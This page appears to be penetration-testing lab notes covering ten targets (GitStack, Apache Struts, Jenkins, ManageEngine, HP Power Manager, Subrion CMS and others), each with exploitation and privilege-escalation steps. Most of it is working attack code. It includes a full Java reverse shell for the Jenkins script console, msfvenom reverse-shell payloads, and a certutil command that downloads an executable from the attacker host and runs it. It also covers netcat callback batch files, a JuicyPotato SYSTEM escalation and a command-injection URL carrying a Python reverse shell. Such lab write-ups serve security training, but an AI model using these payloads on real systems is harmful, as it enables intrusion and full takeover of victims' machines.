Skip to main content

Web 3

Web 21: GitStack

Target: Windows

Foothold: RCE

  • HTTP 404 shows the web root
  • Default credentials to login to GitStack
  • searchsploit shows this software is vulnerable RCE
  • Use metasploit module windows/http/gitstack_rce

Privilege Escalation: Vulnerable service is running as SYSTEM


Web 22: Apache Struts

Target: Windows

Foothold: REST RCE

  • Used metasploit module exploit/multi/http/struts2_rest_xstream 
set rhost <target>
set rport <tcp port>
set targeturi </struts2-rest-showcase/orders/id#>
set lhost <kali ip>
set lport <tcp port>
set payload cmd/windows/reverse_powershell

Privilege Escalation: Vulnerable service is running as SYSTEM


Web 23: Zeroshell

Target: Windows

Foothold: RCE

  • Run Metasploit console and use module linux/http/49096 
set rhosts <target>
set rport <tcp port>
set srvport 80
set lhost <kali ip>
set lport <tcp port>
run

Privilege Escalation: Vulnerable service is running as Root


Web 24: WingFTP Server

Target: Windows

Foothold: RCE

  • Start Metasploit console and use exploit/windows/ftp/wing_ftp_admin_exec 
set username admin
set password admin
set rhosts <target>
set lhost <kali ip>
set lport <tcp port>
run

Privilege Escalation: Vulnerable service is running as SYSTEM


Web 25: Jenkins Server

Target: Windows

Foothold: RCE

  • http://$target/jenkins/script
  • Had anonymous access to Groovy script execution
  • Used a Java reverse shell payload
String host="kali-ip";
int port=tcp-port;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
  • Start a listener
  • Run the Groovy script

Privilege Escalation: SeImpersonatePrivilege

  • Download to Kali: JuicyPotato.exe
  • Copy /usr/share/windows-resources/binaries/nc.exe to current directory
  • Transfer to target
  • Start a netcat listener
  • On the target create a .bat file that will call nc.exe 
# CMD reverse shell
# No quotes around the payload
C:\Users\username\Desktop> echo C:\path\to\nc.exe <kali-ip> <tcp-port> pwn.bat

# PowerShell reverse shell
PS C:\Users\username\Desktop> 'C:\path\to\nc.exe <kali-ip> <tcp-port>' > pwn.bat
  • Get a valid CLSID to use for the potato attack
# CMD reverse shell
C:\Users\username\Desktop> powershell -nop -c "New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null; Get-ItemProperty HKCR:\clsid\* | Where-Object AppId -ne $null | Select-Object '(default)', PSChildName"
  • Run the potato attack (used BITS CLSID)
JuicyPotato.exe -p .\pwn.bat -l 8080 -t * -c {69AD4AEE-51BE-439b-A92C-86AE490E8B30}
Testing {69AD4AEE-51BE-439b-A92C-86AE490E8B30} 8080
......
[+] authresult 0
{69AD4AEE-51BE-439b-A92C-86AE490E8B30};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

Web 26: ManageEngine Applications Manager (Build 14700)

Target: Windows

Foothold: RCE

  • Click on Admin tab
  • Actions > Execute program
  • Create a reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$kaliIP LPORT=$kaliPort -f exe -o shell.exe

Action 1: Upload reverse shell

  • Display Name: Download file
  • Script Location: Local Server
  • Program to Execute:
certutil.exe -urlcache -split -f http://<kali-ip>/shell.exe C:\Windows\Temp\shell.exe
  • Directory to Execute Program: C:\Windows\System32
  • Click Create Action
  • Start a web server to host the file
  • Execute the action

Action 2: Run the reverse shell

  • Display Name: Reverse shell
  • Script Location: Local Server
  • Program to Execute: shell.exe
  • Directory to Execute Program: C:\Windows\Temp
  • Click Create Action
  • Start a listener to catch the shell
  • Execute the acion

Privilege Escalation: Vulnerable service is running as SYSTEM


Web 27: HP Power Manager 4.2 (Build 7)

Target: Windows

Foothold: Buffer Overflow and RCE

  • This version of HP Power Manager is vulnerable to CVE-2009-2585
  • Manual exploit: https://raw.githubusercontent.com/n4xh4ck5/CVE2009-2585_HP_Power_Manager_BoF/master/CVE2009-2585_HP_Power_Manager_BoF.py
  • Generate new shellcode and replace what's in the exploit
msfvenom -p windows/shell_reverse_tcp LHOST=$kaliIP LPORT=$kaliPort EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python -v buf
  • Start a listener
  • Run exploit
python2 CVE2009-2585_HP_Power_Manager_BoF.py $target

Privilege Escalation: Vulnerable service is running as SYSTEM


Web 28: ManageEngine ServiceDesk Plus 7.6.0

Target: Windows

Foothold: Authenticated Arbitrary File Upload and Path Traversal

  • This version of this product is vulnerable to path traversal and file upload
  • Can upload a WAR payload to Java server and cause it to deploy
  • Create the WAR file
msfvenom -p java/shell/reverse_tcp LHOST=$kaliIP LPORT=$kaliPort -f war -o pwnz.war
  • Start a listener
sudo msfconsole

use exploit/multi/handler
set LHOST kaliIP
set LPORT kaliPort
set payload java/shell/reverse_tcp
  • Run the exploit
python3 CVE-2014-5301.py $target $kaliPort administrator administrator pwnz.war

Privilege Escalation: Vulnerable service is running as SYSTEM


Web 29: Subrion CMS 4.2.1

Target: Linux

Foothold: File Upload and RCE

python3 49876.py -u 'http://base.uri/panel/' -l 'admin' -p 'admin'

Privilege Escalation: Cron Job

  • Output contents of /etc/crontab and see recurring job running as root calling script in /opt
  • Script is readable. It calls exiftool and loads filenames with keyword jpg from /var/www/html/subrion/uploads
  • I have write access as www-data and even if I didn't, I could upload via the Subrion control panel
  • Run apt list --installed | grep exiftool and find it is vulnerable to CVE-2021-22204
  • Google search site:github.com -metasploit CVE-2021-22204
  • Nice tool here to automate exploit generation
  • Modify variables in script
  • Make the .jpg payload by running exploit.py
  • Upload the file to the target
  • Start a listener and wait for the cron job to load the file

Web 30: Angular Web App

Target: Linux

Foothold: RCE

  • Examine web page source
  • Sources a main.js, inspect it
  • main.js makes a call to /api subdirectory
  • goubster enum /api and find /api/users and /api/settings
  • Get /api/users and get JSON array of usernames
  • Get /api/settings and get JSON of user settings
  • Use PowerShell to elevate application privileges via HTTP POST
$r = iwr http://$target -SessionVariable ws 
$login = iwr http://$target/login -Method Post -Body @{username = 'dev-acct'; password = 'password'} -WebSession $ws
iwr http://$target/api/settings -Method Post -Body @{'color-theme' = 'light' ; lang = 'en' ;admin = $true} -WebSession $ws
  • Not that I am an admin, there is an input textbox
  • Input box does not sanitize inputs
  • Inject a reverse shell
http://$target/api/backup?filename=;python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.49.64%22,53));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27;

Privilege Escalation: Vulnerable service is running as root

Back to top